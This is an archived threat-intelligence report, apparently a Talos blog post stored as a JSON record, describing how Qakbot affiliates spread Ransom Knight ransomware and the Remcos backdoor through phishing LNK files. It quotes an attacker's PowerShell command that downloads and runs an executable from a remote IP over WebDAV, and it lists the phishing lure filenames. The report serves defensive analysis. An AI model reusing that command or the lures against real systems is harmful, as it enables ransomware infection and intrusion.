{
	"id": "c79fc5ff-ce58-4292-9b60-879afc7c9e75",
	"created_at": "2026-04-06T00:17:17.225489Z",
	"updated_at": "2026-04-10T03:21:29.826104Z",
	"deleted_at": null,
	"sha1_hash": "2117312cd27bf2350c19c9dcd74dfe51a9d5709d",
	"title": "Qakbot-affiliated actors distribute Ransom Knight malware despite infrastructure takedown",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 887694,
	"plain_text": "Qakbot-affiliated actors distribute Ransom Knight malware\r\ndespite infrastructure takedown\r\nBy Guilherme Venere\r\nPublished: 2023-10-05 · Archived: 2026-04-05 16:50:27 UTC\r\nThursday, October 5, 2023 07:00\r\nThe threat actors behind the Qakbot malware have been conducting a campaign since early August 2023 in\r\nwhich they have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing\r\nemails.\r\nNotably, this activity appeared to begin before the FBI seized Qakbot infrastructure in late August and has\r\nbeen ongoing since, indicating the law enforcement operation may not have impacted Qakbot operators’\r\nspam delivery infrastructure but rather only their command and control (C2) servers.\r\nTalos attributed this new campaign to Qakbot affiliates as the metadata found in LNK files used in this\r\ncampaign matches the metadata from machines used in previous Qakbot campaigns “AA” and ”BB.”\r\nThough we have not seen the threat actors distributing Qakbot itself post-infrastructure takedown, we\r\nassess the malware will continue to pose a significant threat moving forward. We see this as likely as the\r\ndevelopers were not arrested and are still operational, opening the possibility that they may choose to\r\nrebuild the Qakbot infrastructure.\r\nIn a late August 2023 operation involving the FBI and many international partners, law enforcement agencies\r\nseized the infrastructure and cryptocurrency assets used by the Qakbot malware, dealing considerable damage to\r\nthe group’s operations. Many people in the security industry wondered whether this would mean that the Qakbot\r\naffiliates were gone forever or just temporarily out of work while rebuilding their infrastructure.\r\nhttps://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/\r\nPage 1 of 5\n\nTalos assesses with moderate confidence that the threat actors behind Qakbot are still active and have been\r\nconducting a new campaign that started just before the takedown, distributing a variant of Cyclops/Ransom\r\nKnight ransomware along with the Remcos backdoor. We tracked this new activity by connecting the metadata in\r\nthe LNK files used in the new campaign to the machines used in previous Qakbot campaigns.\r\nIn January 2023, we wrote a blog post on using metadata from LNK files to identify and track threat actors. We\r\nspecifically detailed how one machine used in the “AA” campaign with a drive serial number of “0x2848e8a8”\r\nwas later used in a campaign for the new botnet named “BB”. After our blog’s publication, primary Qakbot actors\r\nresponsible for the “AA”, “BB”, and “Obama” campaigns started to wipe out the metadata in their LNK files to\r\nmake detection and tracking harder.\r\nTalos identified new LNK files in August 2023 that were created on the same machine referenced above, but\r\nobserved that the payload of the files pointed to a network share in the command line that served a variant of\r\nRansom Knight ransomware. Further analysis of the files revealed they point to Powershell.exe and pass the\r\nfollowing arguments to download the next stage:\r\n-c \"explorer '\\\\89[.]23[.]96[.]203@80\\333\\'\"; Start-Sleep -Seconds 1; Stop-Process -Name explorer;\r\n\\\\89[.]23[.]96[.]203@80\\333\\information.exe\r\nThe command above opens Explorer.exe and attempts to access a remote network share on IP 89[.]23[.]96[.]203\r\nusing WebDAV on port 80. This method could be an attempt to bypass command line detection for downloading\r\nof a remote executable via PowerShell (T1105 Ingress Tool Transfer).\r\nThe filenames of these LNK files, with themes of urgent financial matters, suggest they are being distributed in\r\nphishing emails, which is consistent with previous Qakbot campaigns:\r\nATTENTION-Invoice-29-August.docx.lnk\r\nbank transfer request.lnk\r\nBooking info.pdf.lnk\r\nFattura NON pagata Agosto 2023.docx.lnk\r\nFRAUD bank transfer report.pdf.lnk\r\ninvoice OTP bank.pdf.lnk\r\nMANDATORY-Invoice-28-August.docx.lnk\r\nNOT-paid-Invoice-26-August.pdf.lnk\r\nNuove coordinate bancarie e IBAN 2023.docx.lnk\r\nNuove coordinate bancarie e IBAN 2023.img.lnk\r\nPay-Invoices-29-August.pdf.lnk\r\nURGENT-Invoice-27-August.docx.lnk\r\nSome of the filenames are written in Italian, which suggests the threat actors may be targeting users in that region.\r\nThe LNK files are being distributed inside Zip archives that also contain an XLL file. XLL is an extension used\r\nfor Excel add-ins, and comes with an icon similar to other Excel file formats:\r\nhttps://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/\r\nPage 2 of 5\n\nZip content for one of the phishing attachments.\r\nAccording to our analysis, these XLL files are the Remcos backdoor which is executed along with Ransom Knight\r\nto give the threat actors access to the machine after the infection:\r\nVirusTotal information for XLL file distributed along Ransom Knight LNK downloader.\r\nThe LNK file, on the other hand, downloads an executable file from remote IP 89[.]23[.]96[.]203 shown in the\r\ncommand line above via WebDAV, which is the actual Ransom Knight payload. This ransomware family is an\r\nupdated version of the Cyclops ransomware-as-a-service, rewritten from scratch. The threat actor behind the\r\nCyclops service announced the new variant in May 2023:\r\nDark web forum post announcing Ransom Knight ransomware.\r\nhttps://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/\r\nPage 3 of 5\n\nWe do not believe the Qakbot threat actors are behind the ransomware-as-a-service offer, but are simply customers\r\nof the service. As this new operation has been ongoing since the beginning of August 2023 and has not stopped\r\nafter the takedown, we believe the FBI operation didn’t affect Qakbot’s phishing email delivery infrastructure but\r\nonly its command and control servers. Though we have not seen the threat actors distributing Qakbot post-infrastructure takedown, we assess the malware will likely continue to pose a significant threat moving forward.\r\nGiven the operators remain active, they may choose to rebuild Qakbot infrastructure to fully resume their pre-takedown activity.\r\nCoverage\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nClamAV detections are available for this threat:\r\nLnk.Downloader.Qakbot\r\nhttps://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/\r\nPage 4 of 5\n\nWin.Ransomware.Knight\r\nWin.Backdoor.Remcos\r\nIOCs\r\nIndicators of Compromise associated with this threat can be found here\r\nSource: https://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/\r\nhttps://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/"
	],
	"report_names": [
		"qakbot-affiliated-actors-distribute-ransom"
	],
	"threat_actors": [],
	"ts_created_at": 1775434637,
	"ts_updated_at": 1775791289,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2117312cd27bf2350c19c9dcd74dfe51a9d5709d.pdf",
		"text": "https://archive.orkl.eu/2117312cd27bf2350c19c9dcd74dfe51a9d5709d.txt",
		"img": "https://archive.orkl.eu/2117312cd27bf2350c19c9dcd74dfe51a9d5709d.jpg"
	}
}